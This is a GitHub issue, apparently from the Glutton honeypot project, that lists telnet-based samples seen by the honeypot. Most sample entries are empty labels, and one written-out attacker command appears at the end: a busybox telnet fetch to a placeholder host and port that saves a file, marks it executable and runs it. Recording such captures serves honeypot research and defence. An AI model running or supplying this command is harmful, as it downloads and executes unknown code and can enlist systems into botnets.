-
-
Notifications
You must be signed in to change notification settings - Fork 58
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Fetch samples by telnet #80
Comments
These are some samples of telnet command that I have seen in Glutton. sample 1: sample 2: sample 3: sample 4: sample 5: sample 6: sample 7: sample 8: sample 9: sample 10: sample 11: sample 12: sample 13: sample 14: sample 15: sample 16:
sample 17: sample 18: sample 19: sample 21: sample 22: sample 23: sample 24: sample 25: sample 26: sample 27: sample 28: sample 29: sample 30: sample 31: sample 32: sample 33: sample 34: |
read /bin/busybox telnet x.x.x.x 6745 > test; /bin/busybox chmod 777 test ; ./test
The text was updated successfully, but these errors were encountered: